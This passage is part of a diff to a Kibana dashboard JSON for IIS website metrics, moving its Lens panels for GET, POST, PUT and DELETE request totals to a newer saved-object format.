"incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "GET Requests/sec" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "49524a34-1a10-49bf-842f-20d2606380a4", + "w": 12, + "x": 12, + "y": 36 + }, + "panelIndex": "49524a34-1a10-49bf-842f-20d2606380a4", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-dd6cafd2-1561-4ba1-9c52-011c21954dd5", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "dd6cafd2-1561-4ba1-9c52-011c21954dd5": { + "columnOrder": [ + "18aac651-4b5a-4cc9-bc07-c27539729436", + "d6c60abc-b75c-489b-8b2f-bd91c6403403", + "be40db0d-71d9-4873-801f-8465d970591c" + ], + "columns": { + "18aac651-4b5a-4cc9-bc07-c27539729436": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" + }, + "orderBy": { + "type": "custom" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "be40db0d-71d9-4873-801f-8465d970591c" - ], - "layerId": "dd6cafd2-1561-4ba1-9c52-011c21954dd5", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "splitAccessor": "18aac651-4b5a-4cc9-bc07-c27539729436", - "xAccessor": "d6c60abc-b75c-489b-8b2f-bd91c6403403", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(104,188,0,1)", - "forAccessor": "be40db0d-71d9-4873-801f-8465d970591c" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" + }, + "be40db0d-71d9-4873-801f-8465d970591c": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total POST Requests ", + "operationType": "max", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1 + } } + }, + "scale": "ratio", + "sourceField": "iis.website.network.total_post_requests" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "d6c60abc-b75c-489b-8b2f-bd91c6403403": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "be40db0d-71d9-4873-801f-8465d970591c" + ], + "layerId": "dd6cafd2-1561-4ba1-9c52-011c21954dd5", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "49524a34-1a10-49bf-842f-20d2606380a4", - "w": 12, - "x": 12, - "y": 36 - }, - "panelIndex": "49524a34-1a10-49bf-842f-20d2606380a4", - "title": "Total POST Requests", - "type": "lens", - "version": "8.5.0" + "seriesType": "line", + "splitAccessor": "18aac651-4b5a-4cc9-bc07-c27539729436", + "xAccessor": "d6c60abc-b75c-489b-8b2f-bd91c6403403", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(104,188,0,1)", + "forAccessor": "be40db0d-71d9-4873-801f-8465d970591c" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-28214240-350e-4835-afe0-f1e8d73e524c", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Total POST Requests" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "fc2ce632-ac12-4835-bceb-6ae9deeaf4c4", + "w": 12, + "x": 24, + "y": 36 + }, + "panelIndex": "fc2ce632-ac12-4835-bceb-6ae9deeaf4c4", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-28214240-350e-4835-afe0-f1e8d73e524c", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "28214240-350e-4835-afe0-f1e8d73e524c": { + "columnOrder": [ + "635ddcd4-14ba-41ee-a1d4-e878cc6756f9", + "9b25acbb-2591-43c7-8740-6423f5ce1387", + "02c7871a-a870-4e24-910c-ab281d070615" + ], + "columns": { + "02c7871a-a870-4e24-910c-ab281d070615": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total PUT Requests ", + "operationType": "max", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "28214240-350e-4835-afe0-f1e8d73e524c": { - "columnOrder": [ - "635ddcd4-14ba-41ee-a1d4-e878cc6756f9", - "9b25acbb-2591-43c7-8740-6423f5ce1387", - "02c7871a-a870-4e24-910c-ab281d070615" - ], - "columns": { - "02c7871a-a870-4e24-910c-ab281d070615": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Total PUT Requests ", - "operationType": "max", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.website.network.total_put_requests" - }, - "635ddcd4-14ba-41ee-a1d4-e878cc6756f9": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - }, - "9b25acbb-2591-43c7-8740-6423f5ce1387": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "iis.website.network.total_put_requests" + }, + "635ddcd4-14ba-41ee-a1d4-e878cc6756f9": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderBy": { + "type": "custom" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "02c7871a-a870-4e24-910c-ab281d070615" - ], - "layerId": "28214240-350e-4835-afe0-f1e8d73e524c", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "splitAccessor": "635ddcd4-14ba-41ee-a1d4-e878cc6756f9", - "xAccessor": "9b25acbb-2591-43c7-8740-6423f5ce1387", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(22,165,165,1)", - "forAccessor": "02c7871a-a870-4e24-910c-ab281d070615" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" - } + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "9b25acbb-2591-43c7-8740-6423f5ce1387": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "02c7871a-a870-4e24-910c-ab281d070615" + ], + "layerId": "28214240-350e-4835-afe0-f1e8d73e524c", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "fc2ce632-ac12-4835-bceb-6ae9deeaf4c4", - "w": 12, - "x": 24, - "y": 36 - }, - "panelIndex": "fc2ce632-ac12-4835-bceb-6ae9deeaf4c4", - "title": "Total PUT Requests", - "type": "lens", - "version": "8.5.0" + "seriesType": "line", + "splitAccessor": "635ddcd4-14ba-41ee-a1d4-e878cc6756f9", + "xAccessor": "9b25acbb-2591-43c7-8740-6423f5ce1387", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(22,165,165,1)", + "forAccessor": "02c7871a-a870-4e24-910c-ab281d070615" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-0b1559e3-6201-4b20-a2bf-29069bc0382d", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Total PUT Requests" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "d9d3a2fc-a39e-40c2-9260-69eb70a2114e", + "w": 12, + "x": 36, + "y": 36 + }, + "panelIndex": "d9d3a2fc-a39e-40c2-9260-69eb70a2114e", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-0b1559e3-6201-4b20-a2bf-29069bc0382d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "0b1559e3-6201-4b20-a2bf-29069bc0382d": { + "columnOrder": [ + "c6acb2f8-d65e-4ee9-acb2-3ec91dba299f", + "b792aa69-a49e-48b5-8353-ccfefb00743e", + "23404543-95e7-4820-b55a-fffdae388ef9" + ], + "columns": { + "23404543-95e7-4820-b55a-fffdae388ef9": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total DELETE Requests ", + "operationType": "max", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "0b1559e3-6201-4b20-a2bf-29069bc0382d": { - "columnOrder": [ - "c6acb2f8-d65e-4ee9-acb2-3ec91dba299f", - "b792aa69-a49e-48b5-8353-ccfefb00743e", - "23404543-95e7-4820-b55a-fffdae388ef9" - ], - "columns": { - "23404543-95e7-4820-b55a-fffdae388ef9": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Total DELETE Requests ", - "operationType": "max", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.website.network.total_delete_requests" - }, - "b792aa69-a49e-48b5-8353-ccfefb00743e": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "c6acb2f8-d65e-4ee9-acb2-3ec91dba299f": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "iis.website.network.total_delete_requests" + }, + "b792aa69-a49e-48b5-8353-ccfefb00743e": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "c6acb2f8-d65e-4ee9-acb2-3ec91dba299f": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderBy": { + "type": "custom" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "23404543-95e7-4820-b55a-fffdae388ef9" - ], - "layerId": "0b1559e3-6201-4b20-a2bf-29069bc0382d", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "splitAccessor": "c6acb2f8-d65e-4ee9-acb2-3ec91dba299f", - "xAccessor": "b792aa69-a49e-48b5-8353-ccfefb00743e", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(244,78,59,1)", - "forAccessor": "23404543-95e7-4820-b55a-fffdae388ef9" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "23404543-95e7-4820-b55a-fffdae388ef9" + ], + "layerId": "0b1559e3-6201-4b20-a2bf-29069bc0382d", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "d9d3a2fc-a39e-40c2-9260-69eb70a2114e", - "w": 12, - "x": 36, - "y": 36 - }, - "panelIndex": "d9d3a2fc-a39e-40c2-9260-69eb70a2114e", - "title": "Total DELETE Requests", - "type": "lens", - "version": "8.5.0" + "seriesType": "line", + "splitAccessor": "c6acb2f8-d65e-4ee9-acb2-3ec91dba299f", + "xAccessor": "b792aa69-a49e-48b5-8353-ccfefb00743e", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(244,78,59,1)", + "forAccessor": "23404543-95e7-4820-b55a-fffdae388ef9" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear", + "yTitle": "" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-aa318ea4-9a32-4128-9637-ceee407f2b93", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Total DELETE Requests" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "f0a4e232-26f6-4b33-b728-62f73cd74f08", + "w": 12, + "x": 0, + "y": 36 + }, + "panelIndex": "f0a4e232-26f6-4b33-b728-62f73cd74f08", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-aa318ea4-9a32-4128-9637-ceee407f2b93", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "aa318ea4-9a32-4128-9637-ceee407f2b93": { + "columnOrder": [ + "9c50c4db-f26b-4c42-a6a3-34e866e8a77e", + "38b75d84-47c1-44ff-8636-2b921bdd8532", + "3320bd98-e6de-45f5-ba1c-73970b10e884" + ], + "columns": { + "3320bd98-e6de-45f5-ba1c-73970b10e884": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total GET Requests ", + "operationType": "max", + "params": { + "emptyAsNull": true, + "format": { + "id": "number", + "params": { + "decimals": 1 + } } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "indexpattern": { - "layers": { - "aa318ea4-9a32-4128-9637-ceee407f2b93": { - "columnOrder": [ - "9c50c4db-f26b-4c42-a6a3-34e866e8a77e", - "38b75d84-47c1-44ff-8636-2b921bdd8532", - "3320bd98-e6de-45f5-ba1c-73970b10e884" - ], - "columns": { - "3320bd98-e6de-45f5-ba1c-73970b10e884": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Total GET Requests ", - "operationType": "max", - "params": { - "emptyAsNull": true, - "format": { - "id": "number", - "params": { - "decimals": 1 - } - } - }, - "scale": "ratio", - "sourceField": "iis.website.network.total_get_requests" - }, - "38b75d84-47c1-44ff-8636-2b921bdd8532": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": true, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "9c50c4db-f26b-4c42-a6a3-34e866e8a77e": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of iis.website.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderAgg": { - "customLabel": false, - "dataType": "number", - "isBucketed": false, - "label": "Count of records", - "operationType": "count", - "params": {}, - "scale": "ratio", - "sourceField": "___records___" - }, - "orderBy": { - "type": "custom" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "secondaryFields": [], - "size": 10 - }, - "scale": "ordinal", - "sourceField": "iis.website.name" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "iis.website.network.total_get_requests" + }, + "38b75d84-47c1-44ff-8636-2b921bdd8532": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "9c50c4db-f26b-4c42-a6a3-34e866e8a77e": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of iis.website.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderAgg": { + "customLabel": false, + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": {}, + "scale": "ratio", + "sourceField": "___records___" }, - "filters": [], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderBy": { + "type": "custom" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": false, - "yRight": true - }, - "fillOpacity": 0, - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "3320bd98-e6de-45f5-ba1c-73970b10e884" - ], - "layerId": "aa318ea4-9a32-4128-9637-ceee407f2b93", - "layerType": "data", - "palette": { - "name": "default", - "type": "palette" - }, - "seriesType": "line", - "splitAccessor": "9c50c4db-f26b-4c42-a6a3-34e866e8a77e", - "xAccessor": "38b75d84-47c1-44ff-8636-2b921bdd8532", - "yConfig": [ - { - "axisMode": "left", - "color": "rgba(104,188,0,1)", - "forAccessor": "3320bd98-e6de-45f5-ba1c-73970b10e884" - } - ] - } - ], - "legend": { - "isVisible": true, - "maxLines": 1, - "position": "right", - "shouldTruncate": true, - "showSingleSeries": true - }, - "preferredSeriesType": "bar_stacked", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true, - "yLeftExtent": { - "mode": "full" - }, - "yLeftScale": "linear", - "yRightExtent": { - "mode": "full" - }, - "yRightScale": "linear", - "yTitle": "" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "iis.website.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": false, + "yRight": true + }, + "fillOpacity": 0, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "3320bd98-e6de-45f5-ba1c-73970b10e884" + ], + "layerId": "aa318ea4-9a32-4128-9637-ceee407f2b93", + "layerType": "data", + "palette": { + "name": "default", + "type": "palette" }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 12, - "i": "f0a4e232-26f6-4b33-b728-62f73cd74f08", - "w": 12, - "x": 0, - "y": 36 - }, - "panelIndex": "f0a4e232-26f6-4b33-b728-62f73cd74f08", - "title": "Total GET Requests", - "type": "lens", - "version": "8.5.0" - } - ], - "timeRestore": false, - "title": "[Metrics IIS] Website Overview", - "version": 1 - }, - "coreMigrationVersion": "8.5.0", - "id": "iis-4b975820-85a1-11ea-91bc-ab084c7ec0e7", - "migrationVersion": { - "dashboard": "8.5.0" - }, - "references": [ - { - "id": "metrics-*", - "name": "d366a32e-1ed5-4089-82b4-e9e34b674c43:indexpattern-datasource-layer-ed85fb90-3616-4a1a-91e7-4baa6c2f0e6d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "ba537347-2422-4e09-931e-c0ff3ad24ca3:indexpattern-datasource-layer-abcf6552-9150-4c04-9dfb-d5be10c7210a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "3ca8af17-0bbf-4697-a193-6f0db4bfeeb8:indexpattern-datasource-layer-81b4a03a-853e-48cb-b24e-c468ed7e9567", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "7dbfdcf7-2742-4a48-8520-170afa068e2c:indexpattern-datasource-layer-443aa393-cacd-4c30-bff3-34efb8d6f0d0", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "5c01ce6f-2b93-439a-b5a0-d911da07af9b:indexpattern-datasource-layer-be28c427-cf5a-425d-95cb-16181c22def6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "6bac7104-6ff4-480a-9987-ce2e92628053:indexpattern-datasource-layer-1479d23f-c6ca-4248-857a-3f81f884e0b2", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "4f05e422-f1be-4856-be21-9be206b34834:indexpattern-datasource-layer-03f125d4-c99c-460e-bc11-be08f9294423", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "2cfab1f4-89e9-4548-b6c0-2533bf6b536b:indexpattern-datasource-layer-a85e6389-be86-43f8-a3e8-9f8231a56b4c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "7ae0e0fd-c4b0-4836-8d7d-15c601312bc0:indexpattern-datasource-layer-9aa14584-ac2e-4743-8fbe-6522dd3f72c6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "97dd63e6-2e3c-45af-bab2-7b8c2ec485ce:indexpattern-datasource-layer-7861c5c5-3d3c-4822-9fd8-0a438969a9d8", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "49524a34-1a10-49bf-842f-20d2606380a4:indexpattern-datasource-layer-dd6cafd2-1561-4ba1-9c52-011c21954dd5", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "fc2ce632-ac12-4835-bceb-6ae9deeaf4c4:indexpattern-datasource-layer-28214240-350e-4835-afe0-f1e8d73e524c", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d9d3a2fc-a39e-40c2-9260-69eb70a2114e:indexpattern-datasource-layer-0b1559e3-6201-4b20-a2bf-29069bc0382d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "f0a4e232-26f6-4b33-b728-62f73cd74f08:indexpattern-datasource-layer-aa318ea4-9a32-4128-9637-ceee407f2b93", - "type": "index-pattern" + "seriesType": "line", + "splitAccessor": "9c50c4db-f26b-4c42-a6a3-34e866e8a77e", + "xAccessor": "38b75d84-47c1-44ff-8636-2b921bdd8532", + "yConfig": [ + { + "axisMode": "left", + "color": "rgba(104,188,0,1)", + "forAccessor": "3320bd98-e6de-45f5-ba1c-73970b10e884" + } + ] + } + ], + "legend": { + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": true, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" + }, + "yLeftScale": "linear", + "yRightExtent": { + "mode": "full" + }, + "yRightScale": "linear", + "yTitle": "" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": 